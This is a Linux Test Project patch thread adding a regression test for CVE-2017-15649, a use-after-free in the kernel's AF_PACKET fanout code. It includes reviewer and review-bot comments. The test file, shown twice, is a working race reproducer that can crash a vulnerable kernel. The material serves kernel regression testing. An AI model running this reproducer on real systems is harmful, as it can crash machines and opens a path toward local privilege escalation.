[v3] Add a regression test for cve-2017-15649

Message ID 20200130092106.4217-1-mmoese@suse.de

Commit Message

Michael Moese Jan. 30, 2020, 9:21 a.m. UTC
net/packet/af_packet.c in the Linux kernel before 4.13.6 allows local
users to gain privileges via crafted system calls that trigger
mishandling of packet_fanout data structures, because of a race
condition (involving fanout_add and packet_do_bind) that leads to a
use-after-free.

See https://ssd-disclosure.com/archives/3484 for more detail.

Signed-off-by: Michael Moese <mmoese@suse.de>

--
Changes since v2:
  - add tags to struct tst_test

Changes since v1:
  - reworked the usage of fuzzy sync library so this should now be
    correct
  - use LTP library functions for file I/O
  - require KASAN to be enabled
---
 runtest/cve                    |   2 +-
 testcases/cve/.gitignore       |   1 +
 testcases/cve/Makefile         |   1 +
 testcases/cve/cve-2017-15649.c | 140 +++++++++++++++++++++++++++++++++
 4 files changed, 143 insertions(+), 1 deletion(-)
 create mode 100644 testcases/cve/cve-2017-15649.c

Comments

Xiao Yang Jan. 30, 2020, 9:56 a.m. UTC | #1
On 1/30/20 5:21 PM, Michael Moese wrote:
> net/packet/af_packet.c in the Linux kernel before 4.13.6 allows local
> users to gain privileges via crafted system calls that trigger
> mishandling of packet_fanout data structures, because of a race
> condition (involving fanout_add and packet_do_bind) that leads to a
> use-after-free.
>
> See https://ssd-disclosure.com/archives/3484 for more detail.
>
> Signed-off-by: Michael Moese <mmoese@suse.de>
>
> --
> Changes to v2:
>    - add tags to struct tst_test
>
> Changes to v1:
>    - reworked the usage of fuzzy sync library so this should now be
>      correct
>    - use LTP library functions for file I/O
>    - require KASAN to be enabled
> ---
>   runtest/cve                    |   2 +-
>   testcases/cve/.gitignore       |   1 +
>   testcases/cve/Makefile         |   1 +
>   testcases/cve/cve-2017-15649.c | 140 +++++++++++++++++++++++++++++++++
>   4 files changed, 143 insertions(+), 1 deletion(-)
>   create mode 100644 testcases/cve/cve-2017-15649.c
>
> diff --git a/runtest/cve b/runtest/cve
> index 57cf66075..b76ddaaaa 100644
> --- a/runtest/cve
> +++ b/runtest/cve
> @@ -24,7 +24,7 @@ cve-2017-12193 add_key04
>   cve-2017-15274 add_key02
>   cve-2017-15299 request_key03 -b cve-2017-15299
>   cve-2017-15537 ptrace07
> -cve-2017-15649 fanout01
> +cve-2017-15649 cve-2017-15649

Hi,

Is fanout01 being replaced because it cannot trigger cve-2017-15649 reliably?

Best Regards,

Xiao Yang

>   cve-2017-15951 request_key03 -b cve-2017-15951
>   cve-2017-17805 af_alg02
>   cve-2017-17806 af_alg01
> diff --git a/testcases/cve/.gitignore b/testcases/cve/.gitignore
> index 01a3e4c8f..08154e2db 100644
> --- a/testcases/cve/.gitignore
> +++ b/testcases/cve/.gitignore
> @@ -8,5 +8,6 @@ cve-2017-2671
>   meltdown
>   stack_clash
>   cve-2017-17052
> +cve-2017-15649
>   cve-2017-16939
>   cve-2017-17053
> diff --git a/testcases/cve/Makefile b/testcases/cve/Makefile
> index da44fff60..6cf3b5af9 100644
> --- a/testcases/cve/Makefile
> +++ b/testcases/cve/Makefile
> @@ -46,5 +46,6 @@ cve-2017-17052:	CFLAGS += -pthread
>   cve-2017-17053:	CFLAGS += -pthread
>   
>   cve-2015-3290:	CFLAGS += -pthread
> +cve-2017-15649: CFLAGS += -pthread
>   
>   include $(top_srcdir)/include/mk/generic_leaf_target.mk
> diff --git a/testcases/cve/cve-2017-15649.c b/testcases/cve/cve-2017-15649.c
> new file mode 100644
> index 000000000..0bbcb6eba
> --- /dev/null
> +++ b/testcases/cve/cve-2017-15649.c
> @@ -0,0 +1,140 @@
> +// SPDX-License-Identifier: GPL-2.0-or-later
> +/*
> + *   Copyright (c) 2019 Michael Moese <mmoese@suse.com>
> + */
> +/* Regression test for CVE-2017-15649
> + * based on the reproducer at https://ssd-disclosure.com/archives/3484
> + *
> + * net/packet/af_packet.c in the Linux kernel before 4.13.6 allows local users
> + * to gain privileges via crafted system calls that trigger mishandling of
> + * packet_fanout data structures, because of a race condition (involving
> + * fanout_add and packet_do_bind) that leads to a use-after-free.
> + *
> + * Be careful! This test may crash your kernel!
> + */
> +
> +#include <pthread.h>
> +#include <stdio.h>
> +#include <sched.h>
> +#include <string.h>
> +#include <time.h>
> +#include <net/if.h>
> +#include <sched.h>
> +#include <sys/types.h>
> +#include <sys/socket.h>
> +
> +#include "tst_test.h"
> +#include "tst_taint.h"
> +#include "tst_safe_pthread.h"
> +#include "tst_fuzzy_sync.h"
> +#include "tst_capability.h"
> +#include "lapi/syscalls.h"
> +
> +static struct tst_fzsync_pair fzsync_pair;
> +
> +static int fd;
> +static struct ifreq ifr;
> +
> +struct sockaddr_ll {
> +	unsigned short	sll_family;
> +	short		sll_protocol;
> +	int		sll_ifindex;
> +	unsigned short	sll_hatype;
> +	unsigned char	sll_pkttype;
> +	unsigned char	sll_halen;
> +	unsigned char	sll_addr[8];
> +};
> +static struct sockaddr_ll addr;
> +
> +void *bind_fn(void *unused)
> +{
> +	while (tst_fzsync_run_b(&fzsync_pair)) {
> +		tst_fzsync_start_race_b(&fzsync_pair);
> +		bind(fd, (struct sockaddr *)&addr, sizeof(addr));
> +		tst_fzsync_end_race_b(&fzsync_pair);
> +	}
> +	return unused;
> +}
> +
> +static void setup(void)
> +{
> +	int real_uid = getuid();
> +	int real_gid = getgid();
> +	int index;
> +
> +	tst_fzsync_pair_init(&fzsync_pair);
> +	tst_taint_init(TST_TAINT_W | TST_TAINT_D | TST_TAINT_L);
> +
> +	if (unshare(CLONE_NEWUSER) != 0)
> +		tst_brk(TBROK | TTERRNO, "unshare(CLONE_NEWUSER) failed");
> +
> +	if (unshare(CLONE_NEWNET) != 0)
> +		tst_brk(TBROK | TTERRNO, "unshare(CLONE_NEWUSER) failed");
> +
> +	SAFE_FILE_PRINTF("/proc/self/setgroups", "deny");
> +	SAFE_FILE_PRINTF("/proc/self/uid_map", "0 %d 1\n", real_uid);
> +	SAFE_FILE_PRINTF("/proc/self/gid_map", "0 %d 1\n", real_gid);
> +
> +	fd = SAFE_SOCKET(AF_PACKET, SOCK_RAW, PF_PACKET);
> +
> +	strcpy((char *) &ifr.ifr_name, "lo");
> +	SAFE_IOCTL(fd, SIOCGIFINDEX, &ifr);
> +	index = ifr.ifr_ifindex;
> +
> +	SAFE_IOCTL(fd, SIOCGIFFLAGS, &ifr);
> +	ifr.ifr_flags &= ~(short) IFF_UP;
> +
> +	SAFE_IOCTL(fd, SIOCSIFFLAGS, &ifr);
> +
> +	addr.sll_family = AF_PACKET;
> +	addr.sll_protocol = 0x0;
> +	addr.sll_ifindex = index;
> +}
> +
> +static void cleanup(void)
> +{
> +	tst_fzsync_pair_cleanup(&fzsync_pair);
> +	SAFE_CLOSE(fd);
> +}
> +
> +static void run(void)
> +{
> +	int fanout = 0x3;
> +
> +	tst_fzsync_pair_reset(&fzsync_pair, bind_fn);
> +
> +	while (tst_fzsync_run_a(&fzsync_pair)) {
> +		tst_fzsync_start_race_a(&fzsync_pair);
> +		setsockopt(fd, 0x107, 18, &fanout, sizeof(fanout));
> +		tst_fzsync_end_race_a(&fzsync_pair);
> +	}
> +
> +	tst_res(TPASS, "please check for KASAN output");
> +}
> +
> +
> +static const char *kconfigs[] = {
> +	"CONFIG_KASAN",
> +	"CONFIG_USER_NS",
> +	NULL
> +};
> +
> +static struct tst_cap caps[] = {
> +	TST_CAP(TST_CAP_REQ, CAP_SYS_ADMIN),
> +	TST_CAP(TST_CAP_REQ, CAP_NET_RAW),
> +	TST_CAP(TST_CAP_DROP, CAP_SYS_ADMIN),
> +	{},
> +};
> +
> +static struct tst_test test = {
> +	.test_all = run,
> +	.setup = setup,
> +	.cleanup = cleanup,
> +	.needs_kconfigs = kconfigs,
> +	.caps = caps,
> +	.tags = (const struct tst_tag[]) {
> +		{"CVE", "2017-15649"},
> +		{"linux-git", "008ba2a13f2d"},
> +	        {}
> +	}
> +};

Patch

diff --git a/runtest/cve b/runtest/cve
index 57cf66075..b76ddaaaa 100644
--- a/runtest/cve
+++ b/runtest/cve
@@ -24,7 +24,7 @@  cve-2017-12193 add_key04
 cve-2017-15274 add_key02
 cve-2017-15299 request_key03 -b cve-2017-15299
 cve-2017-15537 ptrace07
-cve-2017-15649 fanout01
+cve-2017-15649 cve-2017-15649
 cve-2017-15951 request_key03 -b cve-2017-15951
 cve-2017-17805 af_alg02
 cve-2017-17806 af_alg01
diff --git a/testcases/cve/.gitignore b/testcases/cve/.gitignore
index 01a3e4c8f..08154e2db 100644
--- a/testcases/cve/.gitignore
+++ b/testcases/cve/.gitignore
@@ -8,5 +8,6 @@  cve-2017-2671
 meltdown
 stack_clash
 cve-2017-17052
+cve-2017-15649
 cve-2017-16939
 cve-2017-17053
diff --git a/testcases/cve/Makefile b/testcases/cve/Makefile
index da44fff60..6cf3b5af9 100644
--- a/testcases/cve/Makefile
+++ b/testcases/cve/Makefile
@@ -46,5 +46,6 @@  cve-2017-17052:	CFLAGS += -pthread
 cve-2017-17053:	CFLAGS += -pthread
 
 cve-2015-3290:	CFLAGS += -pthread
+cve-2017-15649: CFLAGS += -pthread
 
 include $(top_srcdir)/include/mk/generic_leaf_target.mk
diff --git a/testcases/cve/cve-2017-15649.c b/testcases/cve/cve-2017-15649.c
new file mode 100644
index 000000000..0bbcb6eba
--- /dev/null
+++ b/testcases/cve/cve-2017-15649.c
@@ -0,0 +1,140 @@ 
+// SPDX-License-Identifier: GPL-2.0-or-later
+/*
+ *   Copyright (c) 2019 Michael Moese <mmoese@suse.com>
+ */
+/* Regression test for CVE-2017-15649
+ * based on the reproducer at https://ssd-disclosure.com/archives/3484
+ *
+ * net/packet/af_packet.c in the Linux kernel before 4.13.6 allows local users
+ * to gain privileges via crafted system calls that trigger mishandling of
+ * packet_fanout data structures, because of a race condition (involving
+ * fanout_add and packet_do_bind) that leads to a use-after-free.
+ *
+ * Be careful! This test may crash your kernel!
+ */
+
+#include <pthread.h>
+#include <stdio.h>
+#include <sched.h>
+#include <string.h>
+#include <time.h>
+#include <net/if.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+
+#include "tst_test.h"
+#include "tst_taint.h"
+#include "tst_safe_pthread.h"
+#include "tst_fuzzy_sync.h"
+#include "tst_capability.h"
+#include "lapi/syscalls.h"
+
+static struct tst_fzsync_pair fzsync_pair;
+
+static int fd;
+static struct ifreq ifr;
+
+struct sockaddr_ll {
+	unsigned short	sll_family;
+	short		sll_protocol;
+	int		sll_ifindex;
+	unsigned short	sll_hatype;
+	unsigned char	sll_pkttype;
+	unsigned char	sll_halen;
+	unsigned char	sll_addr[8];
+};
+static struct sockaddr_ll addr;
+
+void *bind_fn(void *unused)
+{
+	while (tst_fzsync_run_b(&fzsync_pair)) {
+		tst_fzsync_start_race_b(&fzsync_pair);
+		bind(fd, (struct sockaddr *)&addr, sizeof(addr));
+		tst_fzsync_end_race_b(&fzsync_pair);
+	}
+	return unused;
+}
+
+static void setup(void)
+{
+	int real_uid = getuid();
+	int real_gid = getgid();
+	int index;
+
+	tst_fzsync_pair_init(&fzsync_pair);
+	tst_taint_init(TST_TAINT_W | TST_TAINT_D | TST_TAINT_L);
+
+	if (unshare(CLONE_NEWUSER) != 0)
+		tst_brk(TBROK | TTERRNO, "unshare(CLONE_NEWUSER) failed");
+
+	if (unshare(CLONE_NEWNET) != 0)
+		tst_brk(TBROK | TTERRNO, "unshare(CLONE_NEWUSER) failed");
+
+	SAFE_FILE_PRINTF("/proc/self/setgroups", "deny");
+	SAFE_FILE_PRINTF("/proc/self/uid_map", "0 %d 1\n", real_uid);
+	SAFE_FILE_PRINTF("/proc/self/gid_map", "0 %d 1\n", real_gid);
+
+	fd = SAFE_SOCKET(AF_PACKET, SOCK_RAW, PF_PACKET);
+
+	strcpy((char *) &ifr.ifr_name, "lo");
+	SAFE_IOCTL(fd, SIOCGIFINDEX, &ifr);
+	index = ifr.ifr_ifindex;
+
+	SAFE_IOCTL(fd, SIOCGIFFLAGS, &ifr);
+	ifr.ifr_flags &= ~(short) IFF_UP;
+
+	SAFE_IOCTL(fd, SIOCSIFFLAGS, &ifr);
+
+	addr.sll_family = AF_PACKET;
+	addr.sll_protocol = 0x0;
+	addr.sll_ifindex = index;
+}
+
+static void cleanup(void)
+{
+	tst_fzsync_pair_cleanup(&fzsync_pair);
+	SAFE_CLOSE(fd);
+}
+
+static void run(void)
+{
+	int fanout = 0x3;
+
+	tst_fzsync_pair_reset(&fzsync_pair, bind_fn);
+
+	while (tst_fzsync_run_a(&fzsync_pair)) {
+		tst_fzsync_start_race_a(&fzsync_pair);
+		setsockopt(fd, 0x107, 18, &fanout, sizeof(fanout));
+		tst_fzsync_end_race_a(&fzsync_pair);
+	}
+
+	tst_res(TPASS, "please check for KASAN output");
+}
+
+
+static const char *kconfigs[] = {
+	"CONFIG_KASAN",
+	"CONFIG_USER_NS",
+	NULL
+};
+
+static struct tst_cap caps[] = {
+	TST_CAP(TST_CAP_REQ, CAP_SYS_ADMIN),
+	TST_CAP(TST_CAP_REQ, CAP_NET_RAW),
+	TST_CAP(TST_CAP_DROP, CAP_SYS_ADMIN),
+	{},
+};
+
+static struct tst_test test = {
+	.test_all = run,
+	.setup = setup,
+	.cleanup = cleanup,
+	.needs_kconfigs = kconfigs,
+	.caps = caps,
+	.tags = (const struct tst_tag[]) {
+		{"CVE", "2017-15649"},
+		{"linux-git", "008ba2a13f2d"},
+	        {}
+	}
+};
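Review bot: run() reports `tst_res(TPASS, "please check for KASAN output")` unconditionally, so on a vulnerable kernel where KASAN catches the use-after-free the test still passes; the taint mask recorded by `tst_taint_init()` in setup() is never consulted because nothing in the file calls `tst_taint_check()`. Either let the library do the check by setting `.taint_check = TST_TAINT_W | TST_TAINT_D | TST_TAINT_L,` in `struct tst_test` (dropping the manual `tst_taint_init()` call), if this LTP version has that field, or finish run() with `if (tst_taint_check()) tst_res(TFAIL, "kernel tainted, check KASAN output"); else tst_res(TPASS, "kernel not tainted");`. Two smaller points in the same hunk: the message for the second unshare reads `"unshare(CLONE_NEWUSER) failed"` although that call is `unshare(CLONE_NEWNET)`, and `setsockopt(fd, 0x107, 18, &fanout, sizeof(fanout))` hard-codes what appear to be SOL_PACKET and PACKET_FANOUT (and `0x3` a PACKET_FANOUT_* mode) — taking these names from <linux/if_packet.h>, which also provides `struct sockaddr_ll` and would make the local redefinition unnecessary, documents the intent and avoids a duplicate-definition clash if that header is ever pulled in transitively.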